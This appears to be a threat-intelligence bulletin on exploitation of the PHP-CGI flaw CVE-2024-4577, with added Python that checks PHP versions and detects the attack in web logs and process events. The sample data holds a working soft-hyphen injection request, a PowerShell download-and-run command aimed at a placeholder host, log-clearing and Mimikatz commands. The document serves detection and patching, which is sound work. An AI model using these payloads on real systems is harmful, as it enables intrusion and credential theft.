2025-03-20

Urgent Patching Advised as CVE-2024-4577 Sees Widespread Exploitation

Level: Tactical | Source: Cisco Talos & GreyNoise | Industries: Education, Entertainment, Technology, Telecommunications, Research


Cisco Talos' identification of active exploitation of CVE-2024-4577, a remote code execution (RCE) flaw in PHP's CGI implementation on Windows, against Japanese organizations since January 2025 is corroborated by GreyNoise telemetry, which shows the attacks are far more widespread and makes patching urgent. The flaw stems from the "Best-Fit" character mapping of certain Windows code pages (notably the Japanese and Chinese locales): a soft hyphen (0xAD) in the query string is converted to an ASCII hyphen before php-cgi parses its arguments, so an attacker can inject command-line switches such as -d and, for example, enable allow_url_include and prepend attacker-supplied code to every request. "While Talos focused on victimology and attacker tradecraft, GreyNoise telemetry reveals a far wider exploitation pattern demanding immediate action from defenders globally," said GreyNoise. Patches have been available since June 2024 (PHP 8.3.8, 8.2.20 and 8.1.29); older branches are end-of-life and remain unfixed. Cisco Talos observed attacks leveraging this vulnerability, with threat actors targeting primarily the technology sector, followed by telecommunications, entertainment, education, research, and e-commerce. According to Talos, "the attacker's motive extends beyond just credential harvesting, based on our observation of other post-exploitation activities, such as establishing persistence, elevating to SYSTEM level privilege, and potential access to adversarial frameworks, indicating the likelihood of future attacks."
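Two defender-side checks for this flaw, added here as an example (this is not code from the Talos or GreyNoise reports): a version test against the fixed releases named above, and a scan of web-server access-log lines for the percent-encoded soft hyphen (%AD) immediately followed by a php-cgi switch letter, which is how the Best-Fit argument injection appears on the wire. The log lines, IP addresses and paths are constructed for the example; the "high" severity is assigned when the injected switches also name the ini directives an attacker needs for code execution.

```python
"""
Added example: exposure and access-log checks for CVE-2024-4577.

1. is_patched(): True when the reported PHP version carries the June 2024 fix
   (8.1.29 / 8.2.20 / 8.3.8). 8.4 shipped after the fix; 8.0 and older are
   end-of-life and never received it, so they are reported as unpatched.
2. find_cgi_argument_injection(): flags access-log lines whose query string
   carries a percent-encoded soft hyphen (%AD) directly followed by a single
   switch letter and a separator, i.e. what php-cgi sees as "-d", "-s", ...
   after Windows Best-Fit mapping turns 0xAD into '-'.
"""
import re

# First fixed release per branch (assumed well known; see PHP 8.3.8 / 8.2.20 / 8.1.29 changelogs).
FIXED = {(8, 1): (8, 1, 29), (8, 2): (8, 2, 20), (8, 3): (8, 3, 8)}


def parse_version(v: str):
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", v)
    if not m:
        raise ValueError(f"unrecognised PHP version: {v!r}")
    return tuple(int(x) for x in m.groups())


def is_patched(version: str) -> bool:
    major, minor, patch = parse_version(version)
    branch = (major, minor)
    if branch in FIXED:
        return (major, minor, patch) >= FIXED[branch]
    # 8.4+ were released with the fix; anything below 8.1 is unfixed EOL.
    return branch > (8, 3)


# Common/combined log format: ip ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# %AD + one switch letter + a separator (+, %20, %3D for '=' or end of query).
SOFT_HYPHEN_SWITCH = re.compile(r"%AD[a-zA-Z](?:\+|%20|%3[dD]|$)", re.IGNORECASE)

# Directives that turn the argument injection into code execution.
PHP_INI_DIRECTIVES = ("allow_url_include", "auto_prepend_file", "disable_functions")


def find_cgi_argument_injection(lines):
    """Return a list of hits, one per log line that looks like a CVE-2024-4577 probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than guessing
        path = m.group("path")
        query = path.partition("?")[2]
        if not SOFT_HYPHEN_SWITCH.search(query):
            continue
        lowered = query.lower()
        severity = "high" if any(d in lowered for d in PHP_INI_DIRECTIVES) else "medium"
        hits.append({
            "ip": m.group("ip"),
            "status": int(m.group("status")),
            "path": path,
            "severity": severity,
        })
    return hits


# Constructed sample log (documentation-range IPs; not real traffic).
SAMPLE_LOG = [
    '203.0.113.10 - - [20/Mar/2025:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '203.0.113.11 - - [20/Mar/2025:10:01:05 +0000] "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 1187',
    '203.0.113.12 - - [20/Mar/2025:10:01:09 +0000] "GET /test.php?%ADs HTTP/1.1" 200 9213',
    '203.0.113.13 - - [20/Mar/2025:10:01:12 +0000] "GET /index.php?q=%ADvisor HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for v in ("8.1.28", "8.1.29", "8.3.7", "8.3.8", "8.0.30", "8.4.1"):
        print(f"PHP {v}: {'patched' if is_patched(v) else 'VULNERABLE'}")
    for hit in find_cgi_argument_injection(SAMPLE_LOG):
        print(hit)
```

The fourth sample line contains %AD followed by a letter but no separator, so it is not flagged; the separator requirement is what keeps ordinary URL-encoded text from tripping the rule. A 200 response to a "-s" probe is itself worth attention, since that switch makes php-cgi return the script source.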

The attack chain begins with exploitation of CVE-2024-4577 to run an embedded PowerShell command that downloads a script from a command-and-control (C2) server. Following initial compromise, the attacker connects to a C2 server over port 8077 and deploys Cobalt Strike for command execution on the victim host. The post-exploitation phase includes reconnaissance commands such as "whoami /all," "dir," and "net time," followed by privilege escalation using JuicyPotato, RottenPotato, and SweetPotato; these rely on SeImpersonatePrivilege, which the service account running the web server and php-cgi typically holds, so a php-cgi foothold is usually one step from SYSTEM. Additional tools include "Ladon.exe," a plugin from the "TaoWu" Cobalt Strike kit, used to bypass User Account Control (UAC). Persistence is achieved through registry modifications with "reg add," specifically adding a beacon executable under the Run registry key.

To evade detection and persist, the attackers leveraged open-source tools such as "SharpTask.exe," "SharpHide.exe," and "SharpStay.exe" to create scheduled tasks, hide registry keys, and install services, respectively. Log-clearing was performed with "wevtutil cl" against the Security, System, Application, and Windows PowerShell logs. The threat actors also ran "fscan.exe" from "C:\Windows\Temp" for network scanning and "Seatbelt.exe" to gather system information. Additionally, "SharpGPOAbuse.exe" was used to manipulate Group Policy Objects (GPOs) for further exploitation. Credential theft was carried out with Mimikatz via the "sekurlsa::logonpasswords" command.
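The two paragraphs above describe a chain that is easy to catch on the endpoint even when the web request was missed. As an added example (not code from Talos or Anvilogic), the rules below replay that chain against constructed process-creation events whose fields mirror Sysmon Event ID 1 / Security 4688: php-cgi spawning a shell, a burst of reconnaissance commands from one parent, a Potato binary run from C:\Windows\Temp, a Run-key "reg add", "wevtutil cl", and "sekurlsa::logonpasswords". Every event, path, PID and URL is made up for the example.

```python
"""
Added example: single-event and sequence rules for the post-exploitation
chain described above, run over constructed process-creation events.
"""
import re
from collections import defaultdict


def _img(e):
    return e["image"].rsplit("\\", 1)[-1].lower()


def _parent(e):
    return e["parent_image"].rsplit("\\", 1)[-1].lower()


def _cmd(e):
    return e["cmdline"].lower()


# (rule name, predicate over one event)
SINGLE_EVENT_RULES = [
    # Initial access: php-cgi should never spawn a shell.
    ("php_cgi_spawns_shell",
     lambda e: _parent(e) == "php-cgi.exe" and _img(e) in ("powershell.exe", "pwsh.exe", "cmd.exe")),
    # Persistence: beacon registered under a Run key.
    ("run_key_persistence",
     lambda e: _img(e) == "reg.exe" and " add " in _cmd(e) and "\\currentversion\\run" in _cmd(e)),
    # Defence evasion: event log cleared.
    ("eventlog_cleared",
     lambda e: _img(e) == "wevtutil.exe" and re.search(r"\b(cl|clear-log)\b", _cmd(e)) is not None),
    # Privilege escalation: Potato family by image name.
    ("potato_privesc",
     lambda e: any(p in _img(e) for p in ("juicypotato", "rottenpotato", "sweetpotato"))),
    # Credential access: Mimikatz module invoked on the command line.
    ("mimikatz_logonpasswords",
     lambda e: "sekurlsa::logonpasswords" in _cmd(e)),
    # Staging: anything executed out of C:\Windows\Temp (fscan, Potatoes, ...).
    ("exec_from_windows_temp",
     lambda e: e["image"].lower().startswith("c:\\windows\\temp\\")),
    # Persistence tooling named in the report.
    ("sharp_persistence_tooling",
     lambda e: _img(e) in ("sharptask.exe", "sharphide.exe", "sharpstay.exe", "sharpgpoabuse.exe")),
]

# Beacon "shell" commands arrive as "cmd.exe /C <command>"; strip that prefix.
CMD_PREFIX = re.compile(r'^"?(?:[a-z]:\\[^"]*\\)?cmd\.exe"?\s+/c\s+', re.IGNORECASE)
RECON_PATTERNS = [re.compile(p) for p in (r"^whoami\b", r"^net\s+time\b", r"^dir\b")]


def recon_command(e):
    """Return the matching recon pattern for an event, or None."""
    body = CMD_PREFIX.sub("", e["cmdline"].strip(), count=1).lower()
    for pat in RECON_PATTERNS:
        if pat.search(body):
            return pat.pattern
    return None


def recon_burst(events, window=60, threshold=2):
    """Alert when one parent runs >= `threshold` distinct recon commands within `window` seconds.
    'dir' alone is far too noisy to alert on; the burst is what matters."""
    by_parent = defaultdict(list)  # parent_pid -> [(ts, pattern)]
    hits = []
    for e in sorted(events, key=lambda x: x["ts"]):
        pat = recon_command(e)
        if pat is None:
            continue
        hist = by_parent[e["parent_pid"]]
        hist.append((e["ts"], pat))
        recent = {p for ts, p in hist if e["ts"] - ts <= window}
        if len(recent) >= threshold:
            hits.append({"rule": "recon_burst", "ts": e["ts"], "parent_pid": e["parent_pid"],
                         "image": e["image"], "cmdline": ", ".join(sorted(recent))})
            by_parent[e["parent_pid"]] = []  # one alert per burst
    return hits


def detect(events):
    hits = []
    for e in sorted(events, key=lambda x: x["ts"]):
        for name, pred in SINGLE_EVENT_RULES:
            if pred(e):
                hits.append({"rule": name, "ts": e["ts"], "image": e["image"], "cmdline": e["cmdline"]})
    hits.extend(recon_burst(events))
    return hits


def _ev(ts, ppid, parent, image, cmdline):
    return {"ts": ts, "parent_pid": ppid, "parent_image": parent, "image": image, "cmdline": cmdline}


# Constructed events (ts = seconds; documentation-range IPs; nothing here is real telemetry).
SAMPLE_EVENTS = [
    _ev(1000, 1200, r"C:\php\php-cgi.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -nop -w hidden -c \"IEX(New-Object Net.WebClient).DownloadString('http://192.0.2.5:8077/a.ps1')\""),
    _ev(1010, 3000, r"C:\Users\Public\beacon.exe", r"C:\Windows\System32\cmd.exe", r"C:\Windows\system32\cmd.exe /C whoami /all"),
    _ev(1015, 3000, r"C:\Users\Public\beacon.exe", r"C:\Windows\System32\cmd.exe", r"C:\Windows\system32\cmd.exe /C dir"),
    _ev(1020, 3000, r"C:\Users\Public\beacon.exe", r"C:\Windows\System32\cmd.exe", r"C:\Windows\system32\cmd.exe /C net time"),
    _ev(1100, 3000, r"C:\Users\Public\beacon.exe", r"C:\Windows\Temp\JuicyPotato.exe", "JuicyPotato.exe -l 1337 -p cmd.exe -t *"),
    _ev(1200, 3000, r"C:\Users\Public\beacon.exe", r"C:\Windows\System32\reg.exe",
        r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\Public\beacon.exe /f"),
    _ev(1300, 3000, r"C:\Users\Public\beacon.exe", r"C:\Windows\System32\wevtutil.exe", "wevtutil cl Security"),
    _ev(1400, 3000, r"C:\Users\Public\beacon.exe", r"C:\Windows\Temp\fscan.exe", "fscan.exe -h 10.0.0.0/24"),
    _ev(1500, 3000, r"C:\Users\Public\beacon.exe", r"C:\Users\Public\m.exe", 'm.exe "privilege::debug" "sekurlsa::logonpasswords" exit'),
    # benign: an admin listing a directory from Explorer
    _ev(1600, 4000, r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", r"C:\Windows\system32\cmd.exe /C dir"),
]

if __name__ == "__main__":
    for h in detect(SAMPLE_EVENTS):
        print(f"{h['ts']:>5} {h['rule']:<28} {h['cmdline']}")
```

The JuicyPotato event fires two rules (Potato name and execution from C:\Windows\Temp), which is the intended overlap: either alone survives an attacker renaming the binary or moving it. The lone "dir" from Explorer at the end is scored by the burst logic but never alerts on its own.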

While the attack methods and tools used in this campaign resemble those associated with the hacker group "Dark Cloud Shield" aka "You Dun," Cisco Talos has refrained from attributing the activity directly to this group. The attackers leveraged adversarial frameworks hosted on Alibaba Cloud, including pre-configured installer scripts designed to deploy a suite of offensive security tools. Talos warns that the continued exploitation of public-facing applications reflects an ongoing trend in attacker tradecraft. Given the exploitation reported by both Cisco Talos and GreyNoise, patching CVE-2024-4577 is critical; where an immediate upgrade is not possible, reject requests carrying a percent-encoded soft hyphen (%AD) in the query string at the web server, or move off php-cgi to FastCGI (php-fpm) or mod_php, and treat any Windows PHP host that still runs CGI mode as a likely compromise to be hunted rather than merely patched.
